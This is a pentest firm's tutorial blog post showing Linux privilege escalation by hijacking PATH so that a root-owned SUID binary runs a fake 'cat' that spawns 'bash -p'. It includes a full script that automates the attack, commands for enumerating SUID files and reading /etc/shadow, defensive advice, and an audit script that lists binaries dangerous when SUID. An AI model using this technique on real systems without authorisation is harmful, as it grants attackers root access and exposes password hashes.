What is Privilege Escalation?
Imagine you are a hacker. You have compromised a Linux system, but only as a low-privilege user. You cannot read critical files such as /etc/shadow (the password hashes) because your account lacks the rights. What can you do in this situation? This is where privilege escalation attacks come in.
Attacks that take the limited access of one account and turn it into the access of a more privileged user, both to widen what the attacker can reach on the system and to get at the intended target, are called privilege escalation attacks. On Linux the user with the highest privileges is root.
In this blog post we show Linux privilege escalation with the PATH variable and the SUID bit, aka “How to become the root user by using the PATH environment variable and the SUID bit”.
What is The SUID (Set Owner User ID) Bit?
SUID is a Linux permission flag on an executable that makes it run with the effective user ID of the file's owner instead of the user who launched it. For example, suppose we have an executable that runs the cat command on the /etc/shadow file. Normally non-root users cannot read /etc/shadow, but if that executable is owned by root and has the SUID bit set, we can read /etc/shadow through it as a non-root user.
Binaries are compiled executables; on Linux most of them live in /bin and /usr/bin. Some of them ship with the SUID bit set, for example passwd. passwd changes a user's password, which means it has to write to /etc/shadow, so when we run it the process has root as its effective user even though we are not root.
We can check file permissions, and of course the SUID bit, with the ls -l command. We can also find every SUID file on the system with the find / -perm -u=s -type f 2>/dev/null command (find / -perm -4000 -type f 2>/dev/null is the same test written in octal).
The SUID bit is shown by the letter “s” in the owner's execute position, e.g. -rwsr-xr-x. A capital “S” in that position means the SUID bit is set but the owner has no execute permission, so the bit does nothing.
What is The PATH Environment Variable?
Before looking at the PATH variable, we should talk about environment variables. In short, environment variables are named values that a process inherits from its parent and that change how the operating system and the programs running on it behave.
Everything is a file in Linux, so the commands we type are files too. For example, cat is a binary file located in the /usr/bin directory. We can check where a command lives with the which command, for example: which cat
The PATH variable is an environment variable holding a colon-separated list of directories in which executables are looked up. When we type cat without a path, how does the shell know where cat is? It walks the directories in PATH from left to right and runs the first cat it finds. The same lookup happens when a program spawns a shell to run a command by bare name, and because PATH is part of the environment, the program gets whatever PATH the user who started it had.
We can list all environment variables with the env command. If we only want to see the PATH variable, we can use the echo $PATH command.
Put Them Together
Now imagine again that you are a hacker. You have compromised a Linux system and are a low-privilege user. Searching the system with the find / -perm -u=s -type f 2>/dev/null command, you find an executable with the SUID bit set. You work out that it reads the /etc/shadow file by running the cat command. As an experienced hacker you know that cat was named without a path, so the shell looks it up through PATH, and PATH comes from your environment. What if you change PATH so that the first cat found is one you created yourself?
Demonstration
We created an executable named prplbx, owned by root and with the SUID bit set, that reads the /etc/shadow file. Now we will become root from the low-privilege user “lowpriv” with the methods we just learned.
First, we search for files that have the SUID bit set.
Now let's run the program to see what it does. It prints the contents of /etc/shadow.
That tells us prplbx is running the cat command, so we can manipulate the PATH variable and supply our own cat (you can confirm the bare cat call with strings, or by watching the binary with ltrace or strace). This manipulation will lead us to root. Next we move to the /tmp folder. Why? Because /tmp is writable by every user, so we can create our new cat command there. Let's create it.
- Navigate to the /tmp folder.
- Write the /bin/bash command to a new file named cat. Note that bash resets its effective UID to the real UID unless it is started with -p, so if all you get back is another lowpriv shell, write /bin/bash -p instead.
- Give the newly created cat file execute permission with the chmod +x command.
- To check the new cat file's permissions, type ls -l and look for the “x” flag.
- To check the new cat file's content, type cat ./cat and confirm the content.
Our new cat file is ready, but the shell will still find /usr/bin/cat first. So we change the PATH variable so that the OS uses our newly created /tmp/cat instead. We can change PATH with the export command: export PATH=/tmp:$PATH. The order matters: /tmp has to come before the directory that holds the real cat, because the search stops at the first match. Appending /tmp at the end would change nothing.
Now when we execute the prplbx binary, it attempts to run the cat command with root privileges. The OS looks through PATH to locate cat and, because of our manipulation, finds it in /tmp first. Our cat file starts a bash shell, so that shell runs with root privileges and we become root. Let's try.
We escalated our privileges from lowpriv user to root user successfully.
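The PATH lookup described in the PATH section and the hijack steps above, put together as an added example (this is not code from the original post). It mimics the left-to-right search a shell performs, stages a fake cat in a private directory rather than straight in /tmp, and puts that directory first in PATH. TARGET is a hypothetical placeholder for the SUID binary (the post's ./prplbx); the relative-name check is a heuristic on the binary's strings.

```shell
#!/bin/sh
# Added example, not code from the original post. Shell functions for the
# two pieces of the technique: how a bare command name is resolved through
# PATH, and how to stage a fake cat and put it first in PATH. TARGET is a
# hypothetical placeholder for the SUID binary (the post's ./prplbx).

# Mimic what /bin/sh does with a bare command name: walk $PATH left to
# right and print the first entry that contains an executable of that name.
resolve_in_path() {
    cmd=$1
    old_ifs=$IFS
    IFS=:
    for dir in $PATH; do
        [ -n "$dir" ] || dir=.            # an empty PATH entry means "."
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            IFS=$old_ifs
            printf '%s\n' "$dir/$cmd"
            return 0
        fi
    done
    IFS=$old_ifs
    return 1
}

# Enumerate SUID files, like the post's find command (octal form of the test).
find_suid() {
    find "${1:-/}" -perm -4000 -type f 2>/dev/null
}

# Heuristic check that the target embeds "cat" as a bare name (no leading
# slash), which is what makes the shell it spawns look cat up via PATH.
# Confirm with ltrace/strace on the real binary; strings alone can mislead.
uses_relative_cat() {
    grep -a -q -E '(^|[^/[:alnum:]_.-])cat([[:space:]]|$)' "$1"
}

# Stage the fake cat in a directory we own and print that directory. The
# post writes straight into /tmp; a private directory is less noisy.
stage_fake_cat() {
    dir=$(mktemp -d)
    # bash resets its effective UID to the real UID unless run with -p, so a
    # bare /bin/bash only stays root if the SUID binary already called
    # setuid(0). -p keeps the euid 0 the binary handed us.
    printf '#!/bin/sh\nexec /bin/bash -p\n' > "$dir/cat"
    chmod +x "$dir/cat"
    printf '%s\n' "$dir"
}

# Put our directory first; the left-to-right search makes it win.
hijack_path() {
    PATH="$1:$PATH"
    export PATH
}

main() {
    target=$1
    uses_relative_cat "$target" || echo "no bare 'cat' in $target, may be a dead end" >&2
    dir=$(stage_fake_cat)
    hijack_path "$dir"
    echo "cat now resolves to $(resolve_in_path cat)"
    "$target"      # root's sh runs "cat /etc/shadow" -> our cat -> bash -p
}

# Run only when a target is given, e.g. TARGET=./prplbx sh hijack.sh
if [ -n "${TARGET:-}" ]; then main "$TARGET"; fi
```

Without TARGET set the script only defines the functions, so it can be sourced and the pieces used one at a time; command -v cat after hijack_path shows the same answer resolve_in_path gives, which is the whole trick.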
Recommendation
- Be very careful when writing custom SUID executables.
- Before making a custom SUID executable, make sure there is no other way to do the task (a sudo rule, a file capability, or a privileged service is often the better choice).
- If a SUID program must run other commands, call them by absolute path and reset PATH (ideally the whole environment) before doing so, and drop privileges as early as you can; never hand a bare command name to system().
- Do not set the SUID bit on programs like cp, find, mv, etc.
You can check which binaries are dangerous to run with the SUID bit set here.
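A defender-side counterpart to the recommendations above, as an added example that is not the post's own code: it lists SUID files under a directory and flags the ones to review first. DANGEROUS_SUID is our own selection of binaries that hand out a shell or arbitrary file access when they run as root, not the list the post links to, and AUDIT_ROOT is a hypothetical environment variable used only to trigger a run.

```shell
#!/bin/sh
# Added example, not the post's own code: a small audit of SUID files that
# flags the ones a defender should review first. DANGEROUS_SUID is our own
# selection of binaries that hand out a shell or arbitrary file access when
# they run as root; it is not the list the post links to.

DANGEROUS_SUID="bash sh dash zsh cp mv find vim vi nano less more awk sed python python3 perl env tar"

# Exact word match of a base name against the list (not a substring test,
# so "finds" or "mvn" do not match "find" or "mv").
is_dangerous() {
    case " $DANGEROUS_SUID " in
        *" $1 "*) return 0 ;;
        *)        return 1 ;;
    esac
}

# All SUID regular files below $1 (default /). Same as the post's
# find / -perm -u=s -type f, written with the octal mode.
list_suid() {
    find "${1:-/}" -perm -4000 -type f 2>/dev/null
}

# One line per SUID file: "LEVEL path reason". Anything group- or
# world-writable is HIGH regardless of name: whoever can write the file
# replaces the code that runs as its owner.
audit_suid() {
    list_suid "$1" | while IFS= read -r f; do
        name=${f##*/}
        mode=$(ls -ld "$f" | cut -c1-10)      # e.g. -rwsr-xr-x
        if is_dangerous "$name"; then
            printf 'HIGH %s %s\n' "$f" "gives a shell or file access when SUID"
        else
            case $mode in
                ?????w????|????????w?)
                    printf 'HIGH %s %s\n' "$f" "SUID file writable by group or others" ;;
                *)
                    printf 'INFO %s %s\n' "$f" "SUID file, review against your baseline" ;;
            esac
        fi
    done
}

# Usage: AUDIT_ROOT=/ sh audit_suid.sh   (AUDIT_ROOT is a hypothetical knob)
if [ -n "${AUDIT_ROOT:-}" ]; then audit_suid "$AUDIT_ROOT"; fi
```

Run it as root so find can descend everywhere; the INFO lines are the ones to diff against a known-good baseline of the distribution's own SUID set, since a new, unexplained SUID file is exactly what the post's prplbx looks like from the outside.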
We hope you found our blog post useful. Don’t forget to check out our Penetration Testing services to stay secure!
If you want to read more on this topic, feel free to check out the PurpleBox Blog Section.